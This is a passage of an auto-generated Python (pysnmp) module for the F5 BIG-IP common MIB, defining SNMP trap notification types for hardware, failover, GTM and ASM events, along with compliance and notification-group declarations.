"bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppObjNotAvail.setStatus('current') bigipGtmAppAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 71)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppAvail.setStatus('current') bigipGtmAppNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 72)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppNotAvail.setStatus('current') bigipGtmJoinedGroup = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 73)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmJoinedGroup.setStatus('current') bigipGtmLeftGroup = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 74)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLeftGroup.setStatus('current') bigipStandByFail = 
NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 75)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipStandByFail.setStatus('current') bigipInetPortExhaustion = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 76)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipInetPortExhaustion.setStatus('current') bigipGtmBoxAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 77)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBoxAvail.setStatus('current') bigipGtmBoxNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 78)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBoxNotAvail.setStatus('current') bigipAsmFtpRequestBlocked = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 79)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmFtpRequestBlocked.setStatus('current') bigipAsmFtpRequestViolation = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 80)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmFtpRequestViolation.setStatus('current') bigipGtmBig3dSslCertExpired = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 81)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBig3dSslCertExpired.setStatus('current') bigipGtmBig3dSslCertWillExpire = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 82)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBig3dSslCertWillExpire.setStatus('current') bigipGtmSslCertExpired = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 83)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmSslCertExpired.setStatus('current') bigipGtmSslCertWillExpire = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 84)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmSslCertWillExpire.setStatus('current') bigipAsmSmtpRequestBlocked = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 85)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmSmtpRequestBlocked.setStatus('current') bigipAsmSmtpRequestViolation = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 86)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmSmtpRequestViolation.setStatus('current') bigipBladeTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 87)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipBladeTempHigh.setStatus('current') bigipBladeNoPower = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 88)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipBladeNoPower.setStatus('current') bigipClusterdNoResponse = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 89)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipClusterdNoResponse.setStatus('current') bigipBladeOffline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 90)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipBladeOffline.setStatus('current') bigipAsmDosAttackDetected = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 91)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmDosAttackDetected.setStatus('current') bigipAsmBruteForceAttackDetected = 
NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 92)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmBruteForceAttackDetected.setStatus('current') bigipAomCpuTempTooHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 93)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAomCpuTempTooHigh.setStatus('current') bigipGtmKeyGenerationRollover = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 94)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmKeyGenerationRollover.setStatus('current') bigipGtmKeyGenerationExpiration = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 95)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmKeyGenerationExpiration.setStatus('current') bigipRaidDiskFailure = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 96)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipRaidDiskFailure.setStatus('current') bigipGtmProberPoolStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 97)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolStatusChange.setStatus('current') bigipGtmProberPoolStatusChangeReason = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 98)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolStatusChangeReason.setStatus('current') bigipGtmProberPoolDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 99)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolDisabled.setStatus('current') bigipGtmProberPoolEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 100)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolEnabled.setStatus('current') bigipGtmProberPoolMbrStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 101)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrStatusChange.setStatus('current') bigipGtmProberPoolMbrStatusChangeReason = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 102)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrStatusChangeReason.setStatus('current') bigipGtmProberPoolMbrDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 103)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrDisabled.setStatus('current') bigipGtmProberPoolMbrEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 104)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrEnabled.setStatus('current') bigipAvrAlertsMetricSnmp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 105)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAvrAlertsMetricSnmp.setStatus('current') bigipAvrAlertsMetricSmtp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 106)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAvrAlertsMetricSmtp.setStatus('deprecated') bigipVcmpAlertsVcmpPowerOn = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 107)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpPowerOn.setStatus('current') bigipVcmpAlertsVcmpPowerOff = NotificationType((1, 3, 6, 1, 4, 
1, 3375, 2, 4, 0, 108)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpPowerOff.setStatus('current') bigipVcmpAlertsVcmpHBLost = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 109)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpHBLost.setStatus('current') bigipVcmpAlertsVcmpHBDetected = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 110)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpHBDetected.setStatus('current') bigipSsdMwiNearThreshold = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 111)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSsdMwiNearThreshold.setStatus('current') bigipSsdMwiReachedThreshold = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 112)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSsdMwiReachedThreshold.setStatus('current') bigipSystemCheckAlertTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 113)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertTempHigh.setStatus('current') bigipSystemCheckAlertVoltageHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 114)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertVoltageHigh.setStatus('current') bigipSystemCheckAlertFanSpeedLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 115)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertFanSpeedLow.setStatus('current') bigipLibhalSsdPhysicalDiskRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 116)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalSsdPhysicalDiskRemoved.setStatus('current') bigipLibhalSsdLogicalDiskRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 117)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalSsdLogicalDiskRemoved.setStatus('current') bigipLibhalDiskBayRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 118)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalDiskBayRemoved.setStatus('current') bigipLibhalBladePoweredOff = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 119)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalBladePoweredOff.setStatus('current') bigipLibhalSensorAlarmCritical = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 120)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalSensorAlarmCritical.setStatus('current') bigipChmandAlertFanTrayBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 121)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChmandAlertFanTrayBad.setStatus('current') bigipUnsolicitedRepliesExceededThreshold = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 122)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUnsolicitedRepliesExceededThreshold.setStatus('current') bigipSystemCheckAlertVoltageLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 123)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertVoltageLow.setStatus('current') bigipSystemCheckAlertMilliVoltageHigh = 
NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 124)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertMilliVoltageHigh.setStatus('current') bigipSystemCheckAlertCurrentHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 125)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertCurrentHigh.setStatus('current') bigipSystemCheckAlertPowerHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 126)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertPowerHigh.setStatus('current') bigipSystemCheckAlertMilliVoltageLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 127)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertMilliVoltageLow.setStatus('current') bigipSystemCheckAlertCurrentLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 128)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertCurrentLow.setStatus('current') bigipSystemCheckAlertPowerLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 129)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertPowerLow.setStatus('current') bigipNodeRate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 130)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipNodeRate.setStatus('current') bigipMemberRate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 131)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipMemberRate.setStatus('current') bigipVirtualRate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 132)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVirtualRate.setStatus('current') bigipDosAttackStart = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 133)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDosAttackStart.setStatus('current') bigipDosAttackStop = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 134)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDosAttackStop.setStatus('current') bigipLtmVsAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 135)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsAvail.setStatus('current') bigipLtmVsUnavail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 136)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsUnavail.setStatus('current') bigipLtmVsEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 137)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsEnabled.setStatus('current') bigipLtmVsDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 138)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsDisabled.setStatus('current') bigipDnsRequestRateLimiterEngaged = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 139)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDnsRequestRateLimiterEngaged.setStatus('current') bigipGtmRequestRateLimiterEngaged = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 140)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: 
bigipGtmRequestRateLimiterEngaged.setStatus('current') bigipTrafficGroupStandby = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 141)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupStandby.setStatus('current') bigipTrafficGroupActive = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 142)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupActive.setStatus('current') bigipTrafficGroupOffline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 143)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupOffline.setStatus('current') bigipTrafficGroupForcedOffline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 144)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupForcedOffline.setStatus('current') bigipTrafficGroupDeactivate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 145)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupDeactivate.setStatus('current') bigipTrafficGroupActivate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 146)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupActivate.setStatus('current') bigipPsPowerOn = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 147)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPsPowerOn.setStatus('current') bigipPsPowerOff = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 148)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPsPowerOff.setStatus('current') bigipPsAbsent = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 149)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPsAbsent.setStatus('current') bigipClusterPrimaryChanged = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 150)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipClusterPrimaryChanged.setStatus('current') bigipSystemShutdown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 151)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemShutdown.setStatus('current') bigipFipsDeviceError = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 152)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFipsDeviceError.setStatus('current') bigipUpdatePriority = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 153)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUpdatePriority.setStatus('current') bigipUpdateServer = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 154)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUpdateServer.setStatus('current') bigipUpdateError = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 155)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUpdateError.setStatus('current') bigipFipsFault = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 156)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFipsFault.setStatus('current') bigipNotificationCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 3375, 2, 5, 1, 4)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjectsGroup"), ("F5-BIGIP-COMMON-MIB", "bigipAgentNotifyGroup")) if getattr(mibBuilder, 
'version', (0, 0, 0)) > (4, 4, 0): bigipNotificationCompliance = bigipNotificationCompliance.setStatus('current') bigipNotifyObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4, 1)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjPort")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): bigipNotifyObjectsGroup = bigipNotifyObjectsGroup.setStatus('current') bigipAgentNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4, 2)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipAgentStart"), ("F5-BIGIP-COMMON-MIB", "bigipAgentShutdown"), ("F5-BIGIP-COMMON-MIB", "bigipAgentRestart")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): bigipAgentNotifyGroup = bigipAgentNotifyGroup.setStatus('current') bigipSystemNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4, 3)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipCpuTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipCpuFanSpeedLow"), ("F5-BIGIP-COMMON-MIB", "bigipCpuFanSpeedBad"), ("F5-BIGIP-COMMON-MIB", "bigipChassisTempHigh"), ("F5-BIGIP-COMMON-MIB", "bigipChassisFanBad"), ("F5-BIGIP-COMMON-MIB", "bigipChassisPowerSupplyBad"), ("F5-BIGIP-COMMON-MIB", "bigipServiceDown"), ("F5-BIGIP-COMMON-MIB", "bigipServiceUp"), ("F5-BIGIP-COMMON-MIB", "bigipNodeDown"), ("F5-BIGIP-COMMON-MIB", "bigipNodeUp"), ("F5-BIGIP-COMMON-MIB", "bigipStandby"), ("F5-BIGIP-COMMON-MIB", "bigipActive"), ("F5-BIGIP-COMMON-MIB", "bigipActiveActive"), ("F5-BIGIP-COMMON-MIB", "bigipFeatureFailed"), ("F5-BIGIP-COMMON-MIB", "bigipFeatureOnline"), ("F5-BIGIP-COMMON-MIB", "bigipLicenseFailed"), ("F5-BIGIP-COMMON-MIB", "bigipLicenseExpired"), ("F5-BIGIP-COMMON-MIB", "bigipTamdAlert"), ("F5-BIGIP-COMMON-MIB", "bigipAggrReaperStateChange"), ("F5-BIGIP-COMMON-MIB", "bigipARPConflict"), ("F5-BIGIP-COMMON-MIB", "bigipNetLinkDown"), ("F5-BIGIP-COMMON-MIB", "bigipDiskPartitionWarn"), ("F5-BIGIP-COMMON-MIB", "bigipDiskPartitionGrowth"), ("F5-BIGIP-COMMON-MIB", "bigipAuthFailed"), ("F5-BIGIP-COMMON-MIB", "bigipConfigLoaded"), ("F5-BIGIP-COMMON-MIB", "bigipLogEmerg"), ("F5-BIGIP-COMMON-MIB", "bigipLogAlert"), ("F5-BIGIP-COMMON-MIB", "bigipLogCrit"), ("F5-BIGIP-COMMON-MIB", "bigipLogErr"), ("F5-BIGIP-COMMON-MIB", "bigipLogWarning"), ("F5-BIGIP-COMMON-MIB", "bigipPacketRejected"), ("F5-BIGIP-COMMON-MIB", "bigipCompLimitExceeded"), ("F5-BIGIP-COMMON-MIB", "bigipSslLimitExceeded"), ("F5-BIGIP-COMMON-MIB", "bigipExternalLinkChange"), ("F5-BIGIP-COMMON-MIB", "bigipAsmRequestBlocked"), ("F5-BIGIP-COMMON-MIB", "bigipAsmRequestViolation"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLinkEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmWideIpEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmPoolMbrEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmServerAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmServerNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmServerDisabled"), 
("F5-BIGIP-COMMON-MIB", "bigipGtmServerEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmVsEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcDisabled"), ("F5-BIGIP-COMMON-MIB", "bigipGtmDcEnabled"), ("F5-BIGIP-COMMON-MIB", "bigipHardDiskFailure"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppObjAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppObjNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmAppNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmJoinedGroup"), ("F5-BIGIP-COMMON-MIB", "bigipGtmLeftGroup"), ("F5-BIGIP-COMMON-MIB", "bigipStandByFail"), ("F5-BIGIP-COMMON-MIB", "bigipInetPortExhaustion"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBoxAvail"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBoxNotAvail"), ("F5-BIGIP-COMMON-MIB", "bigipAsmFtpRequestBlocked"), ("F5-BIGIP-COMMON-MIB", "bigipAsmFtpRequestViolation"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBig3dSslCertExpired"), ("F5-BIGIP-COMMON-MIB", "bigipGtmBig3dSslCertWillExpire"), ("F5-BIGIP-COMMON-MIB", "bigipGtmSslCertExpired"), ("F5-BIGIP-COMMON-MIB", "bigipGtmSslCertWillExpire"), ("F5-BIGIP-COMMON-MIB", "bigipAsmSmtpRequestBlocked"), ("F5-BIGIP-COMMON-MIB", 